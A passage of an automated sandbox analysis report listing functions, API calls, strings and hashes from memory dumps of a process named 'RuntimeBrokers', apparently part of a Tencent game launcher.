                                          • Part of subcall function 6C0BE57D: __EH_prolog3_GS.LIBCMT ref: 6C0BE584
                                          • Part of subcall function 6C0BE57D: ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(0000001C,0000001C,6C0E884F), ref: 6C0BE58D
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,?,?,?,?,?,0000006C), ref: 6C12EF8F
                                          • Part of subcall function 6C1039CE: __EH_prolog3_GS.LIBCMT ref: 6C1039D5
                                          • Part of subcall function 6C1039CE: ?parent_path_end@path@filesystem@ierd_tgp@@ABEIXZ.COMMON(00000024,6C102156,?,?), ref: 6C1039E7
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON ref: 6C12EFA5
                                          • Part of subcall function 6C0BFACF: __EH_prolog3.LIBCMT ref: 6C0BFAD6
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        • ?path_to_str@common@ierd_tgp@@YA_NABVpath@filesystem@2@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,00000000), ref: 6C12EFD1
                                          • Part of subcall function 6C130002: __EH_prolog3_GS.LIBCMT ref: 6C130009
                                          • Part of subcall function 6C130002: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,0000001C), ref: 6C13002E
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$D@std@@U?$char_traits@V?$allocator@V?$basic_string@$U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$?parent_path@path@filesystem@ierd_tgp@@D@2@@std@@V123@W@2@@std@@$?has_parent_path@path@filesystem@ierd_tgp@@?parent_path_end@path@filesystem@ierd_tgp@@?path_to_str@common@ierd_tgp@@?str_to_path@common@ierd_tgp@@?u16to8@common@ierd_tgp@@?u8to16@common@ierd_tgp@@?wstring@path@filesystem@ierd_tgp@@D@2@@4@@D@2@@std@@@H_prolog3Vpath@filesystem@2@Vpath@filesystem@2@@W@2@@4@@memmove
                                        • String ID:
                                        • API String ID: 266873086-0
                                        • Opcode ID: 41e2e8e35d662c0548c450f0dbd152539af6a289658d8ace5df9b2295770828b
                                        • Instruction ID: d1831e8d801cdb675b66d0304d89a77f9d70b99c5a65bd19cca51c175dfb4b19
                                        • Opcode Fuzzy Hash: 41e2e8e35d662c0548c450f0dbd152539af6a289658d8ace5df9b2295770828b
                                        • Instruction Fuzzy Hash: CB3146B5C05248DADB24CFE8C890BDDFBB0AF19318F64025ED125B7692C7395A89CB50
                                        Function 6C10BDAF Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10BDB9
                                          • Part of subcall function 6C0C60AA: __EH_prolog3_GS.LIBCMT ref: 6C0C60B1
                                          • Part of subcall function 6C0C60AA: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000040,00000034,6C0C7475,0000001C,6C0C59BA,?,?,?,000000D4,6C0C4672,?,?), ref: 6C0C60C6
                                          • Part of subcall function 6C0C73AA: __EH_prolog3_GS.LIBCMT ref: 6C0C73B1
                                          • Part of subcall function 6C0C73AA: CryptGenRandom.ADVAPI32(?,?,?,00000034,6C0C748A,?,00000010,0000001C,6C0C59BA,?,?,?,000000D4,6C0C4672,?,?), ref: 6C0C73BF
                                          • Part of subcall function 6C1088B8: __EH_prolog3.LIBCMT ref: 6C1088BF
                                          • Part of subcall function 6C1088B8: ??0?$basic_ios@_WU?$char_traits@_W@std@@@std@@IAE@XZ.MSVCP140(00000008,6C10BE0C,00000002,00000001,00000000,00000010,000000E4,6C10A18D,?,.guid.,000000FF,00000000,?,00000000,?), ref: 6C1088DC
                                          • Part of subcall function 6C1088B8: ??0?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAE@PAV?$basic_streambuf@_WU?$char_traits@_W@std@@@1@_N@Z.MSVCP140(00000003,00000000,00000000,00000008,6C10BE0C,00000002,00000001,00000000,00000010,000000E4,6C10A18D,?,.guid.,000000FF,00000000,?), ref: 6C1088F4
                                        • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAVios_base@1@AAV21@@Z@Z.MSVCP140(6C0B0520,00000002,00000001,00000000,00000010,000000E4,6C10A18D,?,.guid.,000000FF,00000000,?,00000000,?), ref: 6C10BE35
                                        • ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QBE_WD@Z.MSVCP140(00000030), ref: 6C10BE4E
                                        • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000002,00000000), ref: 6C10BE7A
                                        • ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@I@Z.MSVCP140(00000000), ref: 6C10BE8A
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?), ref: 6C10BECA
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_$W@std@@@std@@$H_prolog3_$CryptD@std@@@std@@U?$char_traits@V01@$??0?$basic_ios@_??0?$basic_ostream@_??1?$basic_ios@??6?$basic_ostream@??6?$basic_ostream@_?widen@?$basic_ios@_?width@ios_base@std@@AcquireContextH_prolog3RandomV21@@V?$basic_streambuf@_Vios_base@1@W@std@@@1@_
                                        • String ID:
                                        • API String ID: 1745564666-0
                                        • Opcode ID: 80c5acf3b7572978d074c79c15df637e8a1d8f506d154655c4e151483eb3d955
                                        • Instruction ID: e03b3eb45fa95150d6e2ac5200c00e772d83b787e62fb412d1c41261bf25de2d
                                        • Opcode Fuzzy Hash: 80c5acf3b7572978d074c79c15df637e8a1d8f506d154655c4e151483eb3d955
                                        • Instruction Fuzzy Hash: 83316F71E00249DBDF11DFA4C858BEDBBB4BF14308F544099E149BB681EBB46A49DF81
                                        Function 004620F2 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 333COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,0000138C), ref: 00462250
                                          • Part of subcall function 004626CC: FindWindowW.USER32(Static,?), ref: 00462788
                                          • Part of subcall function 004626CC: SendMessageW.USER32(00000000,0000004A,?,00000000), ref: 004627C5
                                        Strings
                                        • TCLSHostApp::FetchServerDirForTgp(), gameID: %llu, xrefs: 0046216B
                                        • TCLSHostApp::FetchServerDirForTgp() gameID: %llu not found, xrefs: 00462266
                                        • %lu, xrefs: 004624D3
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ExistsFileFindMessagePathSendWindow
                                        • String ID: %lu$TCLSHostApp::FetchServerDirForTgp() gameID: %llu not found$TCLSHostApp::FetchServerDirForTgp(), gameID: %llu
                                        • API String ID: 4195137665-1486342331
                                        • Opcode ID: fb8a9fa933d530a609e24a8cef50a6edf133e153ba57b23d7596d931ec556a98
                                        • Instruction ID: 4b92cb505474227cf8a196200d12da88a0cd8b403299399ce34773488c0c6a84
                                        • Opcode Fuzzy Hash: fb8a9fa933d530a609e24a8cef50a6edf133e153ba57b23d7596d931ec556a98
                                        • Instruction Fuzzy Hash: 55020670901268EFEB20DB54CD45BDEBBF0AF14304F0640EAE489A7292DB759B84DF95
                                        Function 6C0CA470 Relevance: 9.1, APIs: 6, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0CA47A
                                          • Part of subcall function 6C0C92AA: __EH_prolog3.LIBCMT ref: 6C0C92B1
                                          • Part of subcall function 6C0C91B9: __EH_prolog3.LIBCMT ref: 6C0C91C0
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DF138,6C0CA559,?,?), ref: 6C0CA4A9
                                        • __EH_prolog3.LIBCMT ref: 6C0CA4B6
                                          • Part of subcall function 6C0C92D9: __EH_prolog3.LIBCMT ref: 6C0C92E0
                                          • Part of subcall function 6C0C91EA: __EH_prolog3.LIBCMT ref: 6C0C91F1
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DF38C), ref: 6C0CA4E1
                                        • __EH_prolog3.LIBCMT ref: 6C0CA4EE
                                          • Part of subcall function 6C0C9308: __EH_prolog3.LIBCMT ref: 6C0C930F
                                          • Part of subcall function 6C0C921B: __EH_prolog3.LIBCMT ref: 6C0C9222
                                        • _CxxThrowException.VCRUNTIME140(?,6C3DF410,?,0000005C,?,6C3DF38C), ref: 6C0CA519
                                          • Part of subcall function 6C0CBB85: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C0CBB9E
                                          • Part of subcall function 6C0CBB85: __allrem.LIBCMT ref: 6C0CBBC9
                                          • Part of subcall function 6C0CE726: QueryPerformanceFrequency.KERNEL32(?,?,6C0CA53C,?,?,?,?,?,?,?,?,?,?,?,?,6C3DF38C), ref: 6C0CE731
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3$ExceptionThrow$FrequencyPerformanceQueryUnothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                        • String ID:
                                        • API String ID: 3221096486-0
                                        • Opcode ID: 3fff8aa0c6f2c54b6788c1e3b94a49a9388f03deb158aeacca28f3d43fac7aca
                                        • Instruction ID: 32a754ccbe6137cc47df72acdd7516ee31b363f377b73120ff803fd2c61c0108
                                        • Opcode Fuzzy Hash: 3fff8aa0c6f2c54b6788c1e3b94a49a9388f03deb158aeacca28f3d43fac7aca
                                        • Instruction Fuzzy Hash: 8121F1B2E0020CABCF04EBE4CC45FCE77BCAF14219F104455B655A7A40DB35A6588BA6
                                        Function 6C12FEB9 Relevance: 9.1, APIs: 6, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C12FEC0
                                        • ?str_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@@Z.COMMON(?,?,0000004C), ref: 6C12FF10
                                        • ?str_to_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAVpath@filesystem@2@@Z.COMMON(?,?,0000004C), ref: 6C12FF20
                                        • ?is_absolute@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON(0000004C), ref: 6C12FF2E
                                        • ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(?,?,?,0000004C), ref: 6C12FF43
                                        • ?path_to_str@common@ierd_tgp@@YA_NABVpath@filesystem@2@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,?,?,?,0000004C), ref: 6C12FF51
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?str_to_path@common@ierd_tgp@@D@2@@std@@Vpath@filesystem@2@@$?absolute@filesystem@ierd_tgp@@?is_absolute@path@filesystem@ierd_tgp@@?path_to_str@common@ierd_tgp@@D@2@@std@@@H_prolog3_V312@0@Vpath@12@Vpath@filesystem@2@
                                        • String ID:
                                        • API String ID: 888674445-0
                                        • Opcode ID: d9767e7227c79c4069c8df1f9a5281c63eddfa9612a541972bd6d91cbe0be18b
                                        • Instruction ID: a5c87a3e0ab2c678404fdff722ec3a8a5a3f1dab8a8a241c38637b4303f5d3d1
                                        • Opcode Fuzzy Hash: d9767e7227c79c4069c8df1f9a5281c63eddfa9612a541972bd6d91cbe0be18b
                                        • Instruction Fuzzy Hash: 37214C72C00258DADF05CFE4C880ADDFBB4BF2A318F54515DD518BB690DB39AA49CB61
                                        Function 6C0C3F3B Relevance: 9.1, APIs: 6, Instructions: 69fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenFileMappingA.KERNEL32(000F001F,00000001,?), ref: 6C0C3F56
                                        • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 6C0C3F77
                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,?,?,?,?,?,6C0C4068,?,?,?,?,6C3DC388,00000008), ref: 6C0C3F9D
                                        • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,6C0C4068,?,?,?,?,6C3DC388,00000008), ref: 6C0C3FAD
                                        • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,6C3DC388,00000008), ref: 6C0C3FCC
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,6C0C4068,?,?,?,?,6C3DC388,00000008), ref: 6C0C3FD5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: File$MappingView$CloseCreateHandleOpenUnmapmemset
                                        • String ID:
                                        • API String ID: 2211058034-0
                                        • Opcode ID: e9587ea82077044b4522fcc6444effa62bfbf10e26aaea15310819a120b30ec9
                                        • Instruction ID: 72283c9c7eb1f79a43e0537312c55d6a8f4d649b50ae37ae21c20865dfb3f1cc
                                        • Opcode Fuzzy Hash: e9587ea82077044b4522fcc6444effa62bfbf10e26aaea15310819a120b30ec9
                                        • Instruction Fuzzy Hash: 7711E6313117246BE7314F048C48B9A77FCEF4AB68F200904FE555BAC0C7709C418662
                                        Function 6C16EAA8 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • _CxxThrowException.VCRUNTIME140(?,6C3FA350,unexpected end of data,?,?,?,?,?,?,?,?,00000000), ref: 6C16EB3F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: expected ' or "$expected =$expected >$expected attribute name$unexpected end of data
                                        • API String ID: 432778473-2454120470
                                        • Opcode ID: 8db63a3f0f457b6997752fbc8a2393370f89fefad0a7acbfcca8f88ecce7350c
                                        • Instruction ID: 29a0c5c1118d5fc00014907fc343f3555f3e24797c6e5f4fc890315ab1cbfbea
                                        • Opcode Fuzzy Hash: 8db63a3f0f457b6997752fbc8a2393370f89fefad0a7acbfcca8f88ecce7350c
                                        • Instruction Fuzzy Hash: E611E372504104AFDB11DF6ACC40EEAB7ECEF66218720091AE4C297F80DB759A65CBA5
                                        Function 6C0BE3AA Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0BE3B4
                                          • Part of subcall function 6C0B9990: __EH_prolog3.LIBCMT ref: 6C0B9997
                                          • Part of subcall function 6C0B9990: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0F78AA,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?,?,?,00000064,6C0F6603), ref: 6C0B99B4
                                          • Part of subcall function 6C0B9990: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,00000008,6C0F78AA,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?), ref: 6C0B99CC
                                        • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(00000000,?,?,00000001,00000001,000000B8,6C0B78D1,?,?,00000000,6C0B77F3,?,?,?,00000064,6C0B77B3), ref: 6C0BE3E7
                                          • Part of subcall function 6C0BDBB9: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AA_K@Z.MSVCP140(000002A0,?,?,6C0BE405,?,?,?,?,00000001,00000001,000000B8,6C0B78D1,?,?,00000000,6C0B77F3), ref: 6C0BDBC5
                                          • Part of subcall function 6C0BDBB9: ?eof@ios_base@std@@QBE_NXZ.MSVCP140(?,?,6C0BE405,?,?,?,?,00000001,00000001,000000B8,6C0B78D1,?,?,00000000,6C0B77F3,?), ref: 6C0BDBD2
                                          • Part of subcall function 6C0BDBB9: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(Function_0001974B,?,?,6C0BE405,?,?,?,?,00000001,00000001,000000B8,6C0B78D1,?,?,00000000,6C0B77F3), ref: 6C0BDBE3
                                        • ?fail@ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000001,00000001,000000B8,6C0B78D1,?,?,00000000,6C0B77F3,?,?,?,00000064,6C0B77B3), ref: 6C0BE418
                                        • ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000001,00000001,000000B8,6C0B78D1,?,?,00000000,6C0B77F3,?,?,?,00000064,6C0B77B3), ref: 6C0BE433
                                        • ?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,?,00000001,00000001,000000B8,6C0B78D1,?,?,00000000,6C0B77F3,?,?,?,00000064,6C0B77B3), ref: 6C0BE443
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,00000001,00000001,000000B8,6C0B78D1,?,?,00000000,6C0B77F3,?,?,?,00000064,6C0B77B3), ref: 6C0BE477
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$V01@$??5?$basic_istream@H_prolog3$??0?$basic_ios@??0?$basic_istream@??1?$basic_ios@?bad@ios_base@std@@?eof@ios_base@std@@?fail@ios_base@std@@?get@?$basic_istream@?imbue@?$basic_ios@D@std@@@1@_V01@@V32@@V?$basic_streambuf@Vlocale@2@
                                        • String ID:
                                        • API String ID: 3692561807-0
                                        • Opcode ID: 417dd88c9816026dc9e9b949ca0a611528a65348b38db8d51b7f6c20d9441e0c
                                        • Instruction ID: 2ff5bd7265b97f52c360d775f2a15263d817113f5910738ce9eb44654b8104e4
                                        • Opcode Fuzzy Hash: 417dd88c9816026dc9e9b949ca0a611528a65348b38db8d51b7f6c20d9441e0c
                                        • Instruction Fuzzy Hash: 79212330A002199FDF28CB64C998BDCB7F8BF15318F1082D9E55AA76D1DB75AA48CF50
                                        Function 6C0F7887 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0F7891
                                          • Part of subcall function 6C0B9990: __EH_prolog3.LIBCMT ref: 6C0B9997
                                          • Part of subcall function 6C0B9990: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0F78AA,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?,?,?,00000064,6C0F6603), ref: 6C0B99B4
                                          • Part of subcall function 6C0B9990: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,00000008,6C0F78AA,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?), ref: 6C0B99CC
                                        • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?,?,?,00000064,6C0F6603), ref: 6C0F78C4
                                          • Part of subcall function 6C0F76DB: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AA_N@Z.MSVCP140(?,?,?,6C0F78E2,?,?,?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643), ref: 6C0F76E7
                                          • Part of subcall function 6C0F76DB: ?fail@ios_base@std@@QBE_NXZ.MSVCP140(?,?,6C0F78E2,?,?,?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?), ref: 6C0F76F4
                                          • Part of subcall function 6C0F76DB: ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,?,6C0F78E2,?,?,?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000), ref: 6C0F7709
                                          • Part of subcall function 6C0F76DB: ?setf@ios_base@std@@QAEHH@Z.MSVCP140(00004000,?,?,6C0F78E2,?,?,?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643), ref: 6C0F771B
                                          • Part of subcall function 6C0F76DB: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AA_N@Z.MSVCP140(?,?,?,6C0F78E2,?,?,?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643), ref: 6C0F7726
                                          • Part of subcall function 6C0F76DB: ?eof@ios_base@std@@QBE_NXZ.MSVCP140(?,?,6C0F78E2,?,?,?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?), ref: 6C0F7733
                                          • Part of subcall function 6C0F76DB: ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(6C0B974B,?,?,6C0F78E2,?,?,?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643), ref: 6C0F7744
                                        • ?fail@ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?,?,?,00000064,6C0F6603), ref: 6C0F78F5
                                        • ?bad@ios_base@std@@QBE_NXZ.MSVCP140(?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?,?,?,00000064,6C0F6603), ref: 6C0F7910
                                        • ?get@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,?,00000001,00000001,000000B0,6C0F6741,?,?,00000000,6C0F6643,?,?,?,00000064,6C0F6603), ref: 6C0F7920
